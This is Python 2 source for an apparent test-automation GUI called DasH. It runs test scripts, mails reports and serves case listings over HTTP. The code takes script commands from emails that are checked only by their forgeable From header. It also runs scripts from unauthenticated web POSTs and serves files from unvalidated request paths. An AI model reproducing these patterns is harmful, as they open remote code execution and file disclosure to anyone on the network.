new_item = self.function_page.InsertItem(new_module, new_module, '{}'.format( attr))
fun_str = '{}.{}'.format(module_name,attr)
item_info = wx.TreeItemData({'name':fun_str,
'tip':self.get_description_of_function(attr_obj),
})
self.dict_function_obj[fun_str] = attr_obj
self.function_page.SetItemData(new_item, item_info)
elif attr_type== types.TypeType:
#class_obj = getattr(lmod, attr)
instance = getattr(lmod, attr)()
self.dict_function_obj['instance'][attr]=instance
new_class = self.function_page.InsertItem(new_module, new_module, attr)
item_info = wx.TreeItemData({'name':'{}.{}'.format(module_name,attr)})
self.function_page.SetItemData(new_class, item_info)
for attr_in_class in sorted(dir(instance)):
if attr_in_class.startswith('__'):
continue
attr_obj = getattr(instance,attr_in_class)
attr_type =type(attr_obj)
if attr_type == types.MethodType :
fun_str = '{}.{}.{}'.format(module_name,attr,attr_in_class)
item_info = wx.TreeItemData({'name':fun_str,
'tip':self.get_description_of_function(attr_obj)})
new_item = self.function_page.InsertItem(new_class, new_class, attr_in_class)
self.dict_function_obj[fun_str] = getattr(instance, attr_in_class)#attr_obj
self.function_page.SetItemData(new_item, item_info)
except :
pass
self.function_page.Expand(root)
first_child = self.function_page.GetFirstChild(root)
self.function_page.Expand(first_child[0])
except Exception as e:
print(traceback.format_exc())
def on_LeftDClick_in_Function_tab(self,event):
event.Skip()
select_item = self.function_page.GetSelection()
fun_name = self.function_page.GetItemData(select_item)
text_in_tree = self.function_page.GetItemText(select_item)
if fun_name != None and fun_name.Data.has_key('name'):
cmd = fun_name.Data['name']
info('click item in Functions tab: {}'.format(fun_name.Data['name']))
wx.CallAfter(self.m_command_box.Clear)
wx.CallAfter(self.m_command_box.AppendText, cmd+' ')
wx.CallAfter(self.m_command_box.SetFocus)
wx.CallAfter(self.m_command_box.SetInsertionPointEnd)
wx.CallAfter(self.m_command_box.Refresh)
def on_refresh_case_page(self, event):
self.case_suite_page.DeleteAllItems()
self.build_suite_tree()
info('Refresh Case tab done!')
def on_right_down_in_session_tab(self, event):
menu = wx.Menu()
item = wx.MenuItem(menu, wx.NewId(), "Refresh")
#acc = wx.AcceleratorEntry()
#acc.Set(wx.ACCEL_NORMAL, ord('O'), self.popupID1)
#item.SetAccel(acc)
menu.AppendItem(item)
self.Bind(wx.EVT_MENU, self.on_refresh_session_page,item)
self.PopupMenu(menu,event.GetPosition())
def on_refresh_session_page(self, event):
self.session_page.DeleteAllItems()
self.build_session_tab()
info('Refresh Session tab done!')
def on_right_down_in_function_tab(self, event):
menu = wx.Menu()
item = wx.MenuItem(menu, wx.NewId(), "Refresh")
#acc = wx.AcceleratorEntry()
#acc.Set(wx.ACCEL_NORMAL, ord('O'), self.popupID1)
#item.SetAccel(acc)
menu.AppendItem(item)
self.Bind(wx.EVT_MENU, self.on_refresh_function_page,item)
self.PopupMenu(menu,event.GetPosition())
def on_refresh_function_page(self, event):
self.function_page.DeleteAllItems()
self.build_function_tab()
info('Refresh Function tab done!')
def add_cmd_to_sequence_queue(self, cmd, module_name, class_name=""):
if self.import_modules.has_key(module_name):
pass
else:
self.import_modules.update({module_name:class_name})
self.sequence_queue.put([cmd,datetime.now() ])
def generate_code(self, file_name ):
#todo 2017-10-21 no code need, when no command entered at all
str_code ="""#created by DasH {}
if __name__ == "__main__":
import sys, traceback
sys.path.insert(0,r'{}')
sys.path.insert(0,r'{}')
import common
log_path= '../log/tmp'
log_path= common.create_case_folder()
DUT={}
try:
""".format(datetime.now().isoformat('-'), self.src_path,self.lib_path , "{}")
sessions =[]
for module in self.import_modules:
str_code+=' import {mod}\n'.format(mod=module)#\n {mod}_instance = {mod}()
for module in self.import_modules:
class_name = self.import_modules[module]
if class_name!="":
str_code+=' {mod}_instance = {mod}.{class_name}()\n'.format(mod=module, class_name=class_name)#\
no_operation = True
while True:
try:
cmd, timestamp =self.sequence_queue.get(block=False)[:2]
str_code +=' {} #{}\n'.format(cmd, timestamp.isoformat( ' '))
if cmd.find('dut.dut(')!=-1:
sessions.append(cmd.split('=')[0].strip())
no_operation=False
#datetime.now().isoformat()
except Exception as e:
break
close_session=''
str_code+=''' except Exception as e:
print(traceback.format_exc())\n'''
for ses in sessions:
str_code+=''' {}.close_session()\n'''.format(ses)
no_operation=False
str_code+=' sys.exit(-1)\n'#, sys.exit(-1)
for ses in sessions:
str_code+=''' {}.close_session()\n'''.format(ses)
info('code saved to file: ',file_name)
info(str_code)
info('code saved to file: ',file_name)
if not no_operation:
with open(file_name, 'a+') as f:
f.write(str_code)
else:
info('No code will be saved to file, due to no operation was performed ',file_name)
def on_right_down_in_case_tab(self, event):
menu = wx.Menu()
item1 = wx.MenuItem(menu, wx.NewId(), "Run Test")
item2 = wx.MenuItem(menu, wx.NewId(), "Kill Test")
item3 = wx.MenuItem(menu, wx.NewId(), "Refresh")
#acc = wx.AcceleratorEntry()
#acc.Set(wx.ACCEL_NORMAL, ord('O'), self.popupID1)
#item.SetAccel(acc)
menu.AppendItem(item1)
menu.AppendItem(item2)
menu.AppendItem(item3)
self.Bind(wx.EVT_MENU, self.on_run_script,item1)
self.Bind(wx.EVT_MENU, self.on_kill_script,item2)
self.Bind(wx.EVT_MENU, self.on_refresh_case_page,item3)
self.PopupMenu(menu,event.GetPosition())
def on_kill_script(self,event):
hit_item = self.case_suite_page.GetSelection()
item_name = self.case_suite_page.GetItemText(hit_item)
item_data = self.case_suite_page.GetItemData(hit_item).Data
if item_data.has_key('PROCESS'):
p = item_data['PROCESS']
name= item_data['FULL_NAME']
info('script:{}, returncode:{}'.format(name,p.returncode))
if p.returncode is None:
#if p.is_alive():
info('Terminate alive process {}:{}'.format(item_name, p.pid))
result ='KILL'
self.update_case_status(p.pid, result)
self.mail_test_report("DASH TEST REPORT-updating")
p.terminate()
else:
result ='FAIL' if p.returncode else 'PASS'
info('{}:{} completed with returncode {}'.format(item_name, p.pid, result))
self.update_case_status(p.pid, result)
def run_script(self, script_name):
old_script_name = script_name
lex = shlex.shlex(script_name)
lex.quotes = '"'
lex.whitespace_split = True
script_name_and_args = list(lex)
script_args = script_name_and_args[1:]
script_name = script_name_and_args[0]
if script_name.find(os.path.sep)!=-1:
pass
else:
script_name= '{}/{}'.format(self.suite_path,script_name)
from lib.common import create_case_folder
old_sys_argv = sys.argv
sys.argv= [script_name]+script_args
case_log_path = create_case_folder(self.log_path )#self.log_path #create_case_folder()
sys.argv= old_sys_argv
try:
if os.path.exists('script_runner.exe'):
execute = 'script_runner.exe'
cmd = [execute,script_name ]+script_args + ['-l','{}'.format(case_log_path)]
#p=subprocess.Popen(cmd, creationflags = subprocess.CREATE_NEW_CONSOLE)
else:
cmd = [sys.executable,'./script_runner.py', script_name ]+script_args+ ['-l','{}'.format(case_log_path)]
p=subprocess.Popen(cmd, creationflags = subprocess.CREATE_NEW_CONSOLE)#, stdin=pipe_input, stdout=pipe_output,stderr=pipe_output)
self.add_new_case_to_report(p.pid, old_script_name, p, case_log_path)
except:
error(traceback.format_exc())
return p, case_log_path
def on_run_script(self,event):
hit_item = self.case_suite_page.GetSelection()
item_name = self.case_suite_page.GetItemText(hit_item)
item_data = self.case_suite_page.GetItemData(hit_item).Data
script_name = self.case_suite_page.GetItemData(hit_item).Data['path_name']
if script_name.lower().split('.')[-1] in ['txt','csv']:#test suite file, not a single script
self.run_a_test_suite(script_name)
else:#a single test case
self.on_kill_script(event)
try:
p, case_log_path = self.run_script('{} {}'.format(script_name, item_name.replace(os.path.basename(script_name), '')))
self.case_suite_page.GetItemData(hit_item).Data['PROCESS']=p
self.case_suite_page.GetItemData(hit_item).Data['FULL_NAME']= item_name
info('start process {} :{}'.format(item_name, p.pid))
#p.join() # this blocks until the process terminates
time.sleep(1)
except Exception as e :
error(traceback.format_exc())
#p = Process(target=run_script, args=[script_name, script_and_args])
#p.start()
def check_case_status(self):
self.check_case_running_status_lock.acquire()
changed=False
running_case = 0
for pid in self.dict_test_report.keys():
case_name, start_time, end_time, duration, return_code ,proc, log_path= self.dict_test_report[pid]
if return_code is None:
if proc.poll() is None:
running_case+=1
debug('RUNNING', start_time, end_time, duration, return_code ,proc, log_path)
else:
changed=True
return_code = 'FAIL' if proc.returncode else 'PASS'
self.update_case_status(pid,return_code)
if running_case:
pass
elif not self.case_queue.empty():#self.case_queue.qsize():
case_name_with_args = self.case_queue.get()
p, case_log_path = self.run_script(case_name_with_args)
self.check_case_running_status_lock.release()
if changed:
#test_report = self.generate_report(filename='{}/dash_report.txt'.format(self.log_path))
self.mail_test_report('DasH Test Report-updating')
return changed
def polling_running_cases(self):
try:
while self.alive:
time.sleep(10)
try:
self.check_case_status()
except:
if self.alive:
error(traceback.format_exc())
except:
pass
print('end polling_running_cases')
time.sleep(0.01)
#sys.exit(0) #break can't exit the app immediately, so change it to exit
#self.check_case_running_status_lock.acquire()
#self.check_case_running_status_lock.release()
def add_new_case_to_report(self, pid, case_name, proc, log_path):
start_time=datetime.now()
duration = 0
end_time = None
return_code = None
#self.check_case_running_status_lock.acquire()
if pid in self.dict_test_report:
self.dict_test_report[pid].update([case_name, start_time, end_time, duration, return_code, proc, log_path])
else:
self.dict_test_report[pid]= [case_name, start_time, end_time, duration, return_code, proc, log_path ]
#self.check_case_running_status_lock.release()
def update_case_status(self, pid,return_code=None):
now = datetime.now()
case_name, start_time, end_time, duration, tmp_return_code ,proc,log_path= self.dict_test_report[pid]
if tmp_return_code is None:
duration = (now-start_time).total_seconds()
if return_code is not None:
end_time=now
self.dict_test_report[pid]=[case_name,start_time, end_time, duration, return_code, proc, log_path]
else:
pass# don't update one case result twice
def mail_test_report(self, subject="DASH TEST REPORT-updating"):
try:
#self.check_case_status()
report_all_cases=True
if subject.find('updating')!=-1:
report_all_cases=False
test_report = self.generate_report(filename='{}/dash_report_{}.html'.format(self.log_path, self.timestamp),report_all_cases= report_all_cases)
#TO, SUBJECT, TEXT, SERVER, FROM
send_mail_smtp_without_login(self.mail_to_list, subject,test_report,self.mail_server,self.mail_from)
except Exception as e:
error(traceback.format_exc())
def on_mail_test_report(self,event):
self.mail_test_report('DasH Test Report-requested')
#p.terminate()
def on_handle_request_via_mail(self):
import imaplib
from email.parser import Parser
def process_multipart_message(message):
if isinstance(message, basestring) or isinstance(message , list):
return message
rtn = ''
try:
if message.is_multipart():
for m in message.get_payload():
rtn += process_multipart_message(m)
else:
rtn += message.get_payload()
except Exception as e:
pass
return rtn
url, user, password = self.mail_read_url,self.mail_user, self.mail_password
if self.mail_user in ['nonexistent@dash.com']:
return
conn = imaplib.IMAP4_SSL(url,993)
#conn.logout()
#conn.authenticate('')
conn.debug = 0#10
def plain_callback(response):
return "{}\x00{}\x00{}".format(user.lower(),user.lower(),password)
try:
conn.authenticate('PLAIN',plain_callback)
except:
conn.login(user,password)
self.mail_failure = False
conn.select('INBOX')#, readonly=True)
try:
authorized_mail_address = self.mail_to_list.replace(',',';').split(';')
except Exception as e:
return
for mail_address in authorized_mail_address:
results,data = conn.search(None,'(UNSEEN)', '(FROM "{}")'.format(mail_address)) # #'ALL')
msg_ids = data[0]
msg_id_list = msg_ids.split()
MAX_UNREAD_MAIL = 50
for unread_mail_id in msg_id_list[::-1][:MAX_UNREAD_MAIL]:
result,data = conn.fetch(unread_mail_id,'(BODY.PEEK[HEADER])')#"(RFC822)")#
raw_email = data[0][1]
p = Parser()
msg = p.parsestr(raw_email)
#msg = process_multipart_message(msg )
from1 = msg.get('From')
sub = '{}'.format(msg.get('Subject'))
sub = sub.strip().lower()
support_list='''
###############################
mail subject below is supported:
dash-request-case-queue : request the cases in queue which to be executed
dash-request-case : request cases which are under suite_path
dash-request-report : request a test report by now
dash-request-kill-running : to kill all running test cases
dash-request-clear-queue : to clear/remove all cases which are in case queue
dash-request-run : to run script(s), each line is a script with arguments if it has
--------------------------------
***non-case-sensitive***
###############################
'''
handled =False
if sub in ['dash']:
send_mail_smtp_without_login(self.mail_to_list, 'DONE-DasH Support List',support_list,self.mail_server,self.mail_from)
handled = True
#conn.uid('STORE', unread_mail_id, '+FLAGS', '\SEEN')
elif sub in ['dash-request-case-queue']:
case_in_queue =self.get_case_queue(None)
send_mail_smtp_without_login(self.mail_to_list, 'DONE-DasH:Case In Queue',case_in_queue+support_list,self.mail_server,self.mail_from)
#conn.uid('STORE', unread_mail_id, '+FLAGS', '\SEEN')
handled = True
elif sub in ['dash-request-case']:
cases_string = '\n\t'.join(self.case_list)
send_mail_smtp_without_login(self.mail_to_list, 'DONE-DasH:Case List',cases_string+support_list,self.mail_server,self.mail_from)
handled = True
#conn.uid('STORE', unread_mail_id, '+FLAGS', '\SEEN')
elif sub in ['dash-request-report']:
self.mail_test_report('DasH Test Report-requested')
#conn.uid('STORE', unread_mail_id, '+FLAGS', '\SEEN')
handled = True
elif sub in ['dash-request-kill-running']:
killed= self.on_kill_running_case()
send_mail_smtp_without_login(self.mail_to_list, 'DONE-[DasH]:Killed Running Case(s)',killed+support_list,self.mail_server,self.mail_from)
handled = True
#conn.uid('STORE', unread_mail_id, '+FLAGS', '\SEEN')
elif sub in ['dash-request-clear-queue']:
case_in_queue = self.on_clear_case_queue()
send_mail_smtp_without_login(self.mail_to_list, 'DONE-DasH:Clear Case Queue',case_in_queue+support_list,self.mail_server,self.mail_from)
handled = True
#conn.uid('STORE', unread_mail_id, '+FLAGS', '\SEEN')
elif sub in ['dash-request-run']:
#if from1 in [ 'yu_silence@163.com',self.mail_to_list]:
conn.uid('STORE', unread_mail_id, '+FLAGS', r'(\SEEN)')
handled = True
#conn.uid('STORE', '-FLAGS', '(\Seen)')
payload = msg.get_payload()
payload = process_multipart_message(payload )
from lib.html2text import html2text
txt = html2text(payload)
cases = txt.replace('\r\n','\n').split('\n')
for line in cases:
line = line.strip()
if line.strip().startswith('#') or len(line)==0:
pass
else:
#done: replace lines below with a function
self.add_line_to_case_queue(line)
result,data = conn.fetch(unread_mail_id,'(RFC822)')#"(RFC822)")#
else:
conn.uid('STORE', unread_mail_id, '-FLAGS', r"(\SEEN)")
#fixed : 2017-09-25 failed to set unmatched mail to unread, to fetch it again with RFC822
if handled:
result,data = conn.fetch(unread_mail_id,'(RFC822)')#"(RFC822)")#
def check_case_type(self, str_line):
lex = shlex.shlex(str_line)
lex.quotes = '"'
lex.whitespace_split = True
script_name_and_args = list(lex)
script_name = script_name_and_args[0]
return script_name.lower().split('.')[-1],script_name_and_args[0] ,script_name_and_args[1:]
def polling_request_via_mail(self):
try:
while self.alive:
time.sleep(5)
try:
self.on_handle_request_via_mail()
self.mail_failure =False
except Exception as e:
self.mail_failure =True
except :
pass
print('end polling_request_via_mail!!!')
time.sleep(0.01)
def get_case_queue(self, item=None):
case_in_queue = list(self.case_queue.queue)
number_in_queue= len(case_in_queue)
if number_in_queue:
str_case_in_queue='\ntotal {} case(s) in Queue\n'.format(number_in_queue)+'\n'.join('{}'.format(x) for x in case_in_queue)
else:
str_case_in_queue='\nNo Case in Queue'
info('Case(s) in Queue', str_case_in_queue)
return str_case_in_queue
def on_clear_case_queue(self, event=None):
case_in_queue = self.get_case_queue(None)
self.case_queue.queue.clear()
self.get_case_queue(None)
return case_in_queue
def on_kill_running_case(self,event=None):
killed_case= ''
for case in self.dict_test_report:
case_name,start_time, end_time, duration, return_code, proc, log_path = self.dict_test_report[:7]
if return_code is None:
if proc.poll() is None:
killed_case+='{}:{}\n'.format(case_name, proc.pid)
info('Terminate alive process {}:{}'.format(case_name, proc.pid))
result ='KILL'
self.update_case_status(proc.pid, result)
proc.terminate()
info('Killed All Running cases', killed_case)
return killed_case
def run_a_test_suite(self, csv_file_name, clear_queue=False, kill_running =False):
try:
case_type, suite_file_name, args =self.check_case_type(csv_file_name)
if clear_queue:
self.on_clear_case_queue()
if kill_running:
self.on_kill_running_case()
import csv
if suite_file_name.find(os.path.sep)!=-1:
pass
else:
suite_file_name= '{}/{}'.format(self.suite_path,suite_file_name)
with open(suite_file_name) as bench:
reader = csv.reader(bench,delimiter=',')
for row in reader:
if len(row)<1:
continue
else:
name = row[0]
args.insert(0,0)
for index in range(1,len(args)):
name =name.replace('{{index}}'.format(index =index), '{}'.format(args[index]))
self.case_queue.put(name)
info('adding case to queue: {}'.format(name))
except Exception as e:
error(traceback.format_exc())
def web_server_start(self):
from SocketServer import ThreadingMixIn
from BaseHTTPServer import HTTPServer,BaseHTTPRequestHandler
import cgi , urllib#StringIO
class HttpHandler(BaseHTTPRequestHandler):
runner_proc =self.add_line_to_case_queue
root = os.path.dirname(__file__)+ '/html/'
home = root
suite_path = self.suite_path
log_path = self.log_path
session_path = self.session_path
def __del__(self):
#self.hdrlog.close()
#print('end http server')
pass
def list_dir(self, path, related_path, pattern=['']):
"""Helper to produce a directory listing (absent index.html).
Return value is either a file object, or None (indicating an
error). In either case, the headers are sent, making the
interface the same as for send_head().
"""
content =""
try:
list = os.listdir(path)
except os.error:
self.send_error(404, "No permission to list directory")
return ""
list.sort(key=lambda a: a.lower())
#f = StringIO()
displaypath = cgi.escape(urllib.unquote(self.path))
content='<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">'
content+="<html>\n<title>Directory listing for %s</title>\n" % displaypath
content+="<body>\n<h2>Directory listing for %s</h2>\n" % displaypath
content+="<hr>\n<ul>\n"
content+='''
<SCRIPT>
function post( id, script, dest )
{
element = document.getElementById(id);
value = element.value
params = 'script='+encodeURI(script)+'&arg='+encodeURI(value)
var xmlhttp;
if (window.XMLHttpRequest)
{// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
}
else
{// code for IE6, IE5
xmlhttp=new ActiveXObject('Microsoft.XMLHTTP');
}
xmlhttp.onreadystatechange=function()
{
if (xmlhttp.readyState==4 && xmlhttp.status==200)
{
alert(xmlhttp.responseText);
newHTML( xmlhttp.responseText);
setTimeout("window.close()",3000);
}
}
xmlhttp.open("POST",dest,true);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send( params );
}
function newHTML(HTMLstring) {
//var checkitem = mygetCheckedItem();
//HTMLstring=post( 'manualtest','/cgi-bin/onSUTLIST.py', 'bedname='+encodeURI(checkitem) );
var newwindow=window.open();
var newdocument=newwindow.document;
newdocument.write(HTMLstring);
newdocument.close();
}
</SCRIPT>
<table>
'''
for name in list:
extension = os.path.basename(name).split('.')[-1]
if pattern in ['', '*', '*.*']:
pass
elif extension in pattern:
pass
else:
continue
fullname = os.path.join(path, name)
displayname = linkname = name
# Append / for directories or @ for symbolic links
if os.path.isdir(fullname):
displayname = name + "/"
linkname = name + "/"
if os.path.islink(fullname):
displayname = name + "@"
# Note: a link to a directory displays with @ and links with /
input_button =""
filename = urllib.quote(linkname)
if not related_path.endswith('/'):
related_path+='/'
fullfilename =related_path+urllib.quote(linkname)
if related_path.startswith('/case') and os.path.isfile(fullname):
input_button = """
<input id=%s name="ARGS" style="width:200" type="text" value="" rows="1" autocomplete="on">
<input name="go" value="Run" type="button" onClick="post('%s','%s', 'RunCase')";>"""%(filename,filename,fullfilename)
elif related_path.startswith('/suite') and os.path.isfile(fullname):
input_button = """
<input id=%s name="ARGS" style="width:200" type="text" value="" rows="1" autocomplete="on">
<input name="go" value="Run" type="button" onClick="post('%s','%s', 'RunSuite')";>
</td></tr>\n"""%(filename,filename,fullfilename)
content+='<tr><td><a href="%s">%s</a></td><td>'% (related_path+urllib.quote(linkname), cgi.escape(displayname))+input_button
content+="</table></ul>\n<hr>\n</body>\n</html>\n"
return content
def array2htmltable(self,Array):
content = "<table border='1' align='left' width=autofit >"
for index , sublist in enumerate( Array):
content += ' <tr><td>\n%d</td><td>'%(index+1)
content += ' </td><td>'.join([x if x!='' else ' ' for x in sublist ])
content += ' \n</td></tr>\n'
content += ' \n </table><br>'
return content
def show_content_by_path(self, path, type='csv'):
header = '''
<table border="0" align='center' width="100%" >
<tr> <td align=center valign=middle><a href="/">Back to DasH</a></td> </tr>
</table>'''
footer = header
if os.path.isfile(path):
indexpage= open(path)
encoded=indexpage.read()
html = []
for line in encoded.split('\n'):
html.append('<p>%s</p>'%line.replace('\r', '').replace('\n',''))
encoded= ''.join(html)
if type in ['csv']:
ar =[]
for line in html:
row = line.split(',')
ar.append(row)
encoded = self.array2htmltable(ar)
# elif type in ['py']:
# ar =[]
# for line in html:
# row = line.split(',')
# ar.append(row)
# encoded = self.array2htmltable(ar)
else:
encoded =self.list_dir(path, self.path, type)
#encoded = "<html>{}</html>".format(cgi.escape(encoded))
encoded =header+encoded.replace('\t', ' ').replace(' ', ' ') + footer
return encoded
def do_GET(self):
root = self.root
home = self.home
suite_path = self.suite_path
log_path = self.log_path
response = 200
type = 'text/html'
if self.path=='/':
indexpage= open(home+ 'index.html', 'r')
encoded=indexpage.read()
encoded = encoded.encode(encoding='utf_8')
elif self.path =='/favicon.ico':
indexpage= open(home+'dash.bmp', 'r')
encoded=indexpage.read()
type = "application/x-ico"
elif self.path=='/home':
path = os.path.abspath(self.suite_path)
encoded =self.list_dir(path, './')
elif self.path.startswith('/sessions'):
path = os.path.abspath(self.session_path)
path = path+ self.path[9:]#replace('/log/','/')
encoded = self.show_content_by_path(path)
elif self.path.startswith('/case'):
path = os.path.abspath(self.suite_path)
path = path+ self.path[5:]#replace('/log/','/')
encoded = self.show_content_by_path(path, 'py')
elif self.path.startswith('/suite'):
path = os.path.abspath(self.suite_path)
path = path+ self.path[6:]#replace('/log/','/')
encoded = self.show_content_by_path(path, 'csv')
elif self.path.startswith('/log'):
path = os.path.abspath(self.log_path)
print(path)
path = path+ self.path[4:]#replace('/log/','/')
encoded = self.show_content_by_path(path, '*')
else:
path = os.path.abspath(root)
path = path+ self.path.replace('//','/')
if os.path.isfile(path):
from lib.common import csvfile2array
arrary = csvfile2array(path)
encoded = self.array2htmltable(arrary)
else:
encoded =self.list_dir(path, self.path)
self.send_response(200)
self.send_header("Content-type", type)
self.end_headers()
self.wfile.write(encoded)
def LoadHTMLPage(self, filename, replace=[], Pattern4ESCAPE1='#NOTEXISTPATTERN_HERE_FOR_STRING_FORMAT1#',Pattern4ESCAPE2='#NOTEXISTPATTERN_HERE_FOR_STRING_FORMAT2#'):
indexpage= open(filename, 'r')
encoded=indexpage.read()
encoded =encoded.replace('%s',Pattern4ESCAPE1 )
encoded =encoded.replace('%',Pattern4ESCAPE2 )
encoded =encoded.replace(Pattern4ESCAPE1,'%s' )
for item in replace:
encoded =encoded.replace('%s', item, 1)
encoded =encoded.replace(Pattern4ESCAPE2, '%' )
return encoded
def RunScript(self, script, args=None):
if not args:
args =''
exe_cmd = '%s %s'%(script,args)
print('Run Script:'+exe_cmd)
encoded = self.runner_proc(exe_cmd)
#encoded ='run{}'.format(exe_cmd)
self.send_response(200)
self.send_header("Content-type", "text/html")#; charset=%s" % enc)
self.end_headers()
self.wfile.write(encoded)
def ParseFormData(self, s):
import re
reP = re.compile('^(-+[\d\w]+)\r\n(.+)-+[\d\w]+-*', re.M|re.DOTALL)
#s = '''-----------------------------186134213815046583202125303385\r\nContent-Disposition: form-data; name="fileToUpload"; filename="case1.csv"\r\nContent-Type: text/csv\r\n\r\n,ACTION,EXPECT,TIMEOUT,CASE OR COMMENTS\n[case1],,,,\n#var,\ncmd,${5}\ncmd2,${cmd2}\n#setup,,,,\ntel,pwd,],10\ntel,ls,],10,\n,ls,],10,\ntel,${cmd},],10,\n,${cmd2},],10,\n#!---,,,,\n\n\r\n-----------------------------186134213815046583202125303385--\r\n'''
#rs = re.escape(s)
rs =s
m = re.match(reP, rs)
print(rs)
if m:
print('match!')
boundary = m.group(1)
print(m.group(2))
c = m.group(2)
index =c.find(boundary)
if index ==-1:
pass
else:
c = c[:index]
l = c.split('\r\n')
print(l)
attribute=l[0].split('; ')
da={}
la =attribute[0].split(':')
da.update({la[0]:la[1]})
for a in attribute[1:]:
la=a.split('=')
da.update({la[0]:la[1].replace('"','').replace('\'','')})
data = '\r\n'.join(l[3:-1])
filename = da['filename']
if filename.find('\\')!=-1:
filename=filename[filename.rfind('\\')+1:]
else:
filename=filename[filename.rfind('/')+1:]
return (da['name'],filename,data)
else:
print('not match')
return None
def do_POST(self):
content_len = int(self.headers['Content-Length'])
#self.queryString
self.path
s = self.rfile.read(content_len)
encoded=''
try:
s=str(s)
import urlparse
req = urlparse.parse_qs(urlparse.unquote(s))
script = '{}/{}'.format(self.suite_path, req['script'][0][7:])
if req.has_key('arg'):
arg= req['arg'][0]
else:
arg = ''
executefile =''
cmd_line = script+ ' '+ arg
encoded=self.runner_proc(cmd_line)
#print(encoded)
encoded = encoded.encode(encoding='utf_8').replace('\t', ' ').replace('\n','')
self.send_response(200)
self.send_header("Content-type", "text/html")#; charset=%s" % enc)
self.end_headers()
self.wfile.write(encoded)
except Exception as e:
import traceback
print(traceback.format_exc())
response = self.ParseFormData(s)
if response:
type, filename, data =response
encoded = self.onUploadFile(type, filename, data)
else:
encoded ='ERROR: %s, Can\'t parse Form data: %s'%(str(e),s)
encoded= encoded.encode(encoding='utf_8')
try:
requestline = self.requestline
import re
reScript=re.compile('POST\s+(.+)\s+HTTP.*', re.DOTALL)
m= re.match(reScript, requestline)
if m:
returncode =self.RunScript(m.group(1),[])
encoded ='script %s completed with return code %d!'%(m.group(1), returncode)
except Exception as e:
encoded ='can\'t run script!'
encoded = encoded.encode(encoding='utf_8', errors='strict')
# self.send_response(200)
# self.send_header("Content-type", "text/html")#; charset=%s" % enc)
# self.end_headers()
# self.wfile.write(encoded)
port =self.web_port
home = __file__ #sys.argv[0]
if os.path.exists(home):
home = os.path.dirname(home)
root = home
home = home +'/html/'
#done move runWebserver to DasH, and launch it at dash initialization
class ThreadingHttpServer(ThreadingMixIn, HTTPServer):
pass
httpd=ThreadingHttpServer(('',port), HttpHandler)
from socket import socket, AF_INET, SOCK_DGRAM, gethostname,SOL_SOCKET, SO_REUSEADDR, getfqdn#*
try:
hostip=''
s = socket(AF_INET, SOCK_DGRAM)
s.bind(("", 1234))
#sq = socket(AF_INET, SOCK_DGRAM)
s.connect(("10.0.0.4", 1234))
domain = getfqdn()
hostip = s.getsockname()[0]
self.web_host = hostip
self.SetTitle('DasH-{}:{}'.format(self.web_host, self.web_port))
s.close()
except Exception as e:
import traceback
msg = traceback.format_exc()
print(msg)
hostname =gethostname()
info("Server started on %s (%s),port %d....."%(hostname,hostip,port))
#print('Process ID:%d'%os.geteuid())
self.web_daemon= httpd
on=1
self.web_daemon.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, on)
httpd.serve_forever()
try:
s.close()
except:
pass
def add_line_to_case_queue(self,line):
type_case, case_name, args = self.check_case_type(line)
if type_case in ['txt','csv']:
self.run_a_test_suite(line)
else:
self.case_queue.put(line)
return info('adding case to queue: {}'.format(line))
def OnMouseMotion(self, evt):
try:
active_page = self.navigator.GetCurrentPage()
pos = self.case_suite_page.ScreenToClient(wx.GetMousePosition())
item_index, flag = active_page.HitTest(pos)
item_data = active_page.GetItemData(item_index)
tip = active_page.GetToolTip()
if item_data :
if item_data.Data.has_key('tip'):
active_page.SetToolTipString(item_data.Data['tip'])
else:
from pprint import pformat
tip_string = pformat(item_data.Data)
active_page.SetToolTipString(tip_string)
if False:
if flag == wx.LIST_HITTEST_ONITEMLABEL:
active_page.SetToolTipString('Some information about ' + self.case_suite_page.GetItemText(item_index))
else:
active_page.SetToolTipString('')
except Exception as e:
pass
evt.Skip()
def on_keyboard_key_down(self,event):
event.Skip()
@gui_event_decorator.gui_even_handle
def on_generate_code(self, event):
self.generate_code('{}/test_code_{}.py'.format(self.suite_path, datetime.now().isoformat().replace(':','-').replace('.','-')))
def on_right_up_over_tab_in_edit_area(self, event):
x = event.GetEventObject()
tabID = x.GetId()
tab = x.FindWindowById(tabID)
#session.session.open(retry, interval)
#tab.open(3,15)
th =threading.Thread(target=self.edit_area.GetCurrentPage().open, args=[1, 5])
#index = self.edit_area.GetCurrentPage().open(1, 60)
th.start()
event.Skip()
#self.edit_area.SetSelection(index)
def idle_process(self):
try:
self.on_handle_request_via_mail()
self.mail_failure =False
except Exception as e:
self.mail_failure =True
try:
self.check_case_status()
except:
pass
#print('{} i\'m idle !!!!!!!!!!!!!!!!!!'.format(datetime.now().isoformat()))
def on_idle(self,event):
now = datetime.now()
max_idle=3
if (now-self.last_time_call_on_idle).total_seconds()>max_idle:
self.last_time_call_on_idle=now
th=threading.Thread(target=self.idle_process, args=[])
th.start()
threading.Thread(target=self.check_whether_function_file_is_updated, args=[]).start()
@gui_event_decorator.gui_even_handle
def on_generate_test_report(self,event):
file_name='{}/dash_report_{}.html'.format(self.log_path, self.timestamp)
report = self.generate_report(filename=file_name)#'{}/dash_report_{}.html'.format(self.log_path, self.timestamp))
report = 'http://{}:{}/log/{}\n{}'.format(self.web_host, self.web_port, file_name.replace(self.log_path, ''),report)
print(report)
@gui_event_decorator.gui_even_handle
def on_leftD_click_url_in_m_log(self, event):
#print(urlString)
mouseEvent = event.GetMouseEvent()
if mouseEvent.LeftDClick():
urlString = self.m_log.GetRange(event.GetURLStart(),event.GetURLEnd())
webbrowser.open(urlString)
event.Skip()
#done: 2017-08-22, 2017-08-19 save main log window to a file
#done: 2017-08-19 add timestamps to log message
#done: 2017-08-22, 2017-08-19 mail to someone
#done: 2017-08-19 run a script in DasH
#done: 2017-08-19 generate test report
#done: 2017-10-7 2017-08-19 publish all test cases in a web page
#done: 2017-10-7 2017-08-19 trigger a test remote via web page
#todo: 2017-08-19 re-run failed cases
#done: 2017-08-19 build executable packege for DasH
#todo: 2017-08-19 a popup window to get email address/password/mail_server...
#done: 2017-08-22 output in m_log window has a lot of empty line, need remove them
#todo: 2017-08-23 in common.call_function_in_module, should end all threads which are started in previous instance
#done: 2017-10-7 2017-08-23 add tips for all tree item in teh left
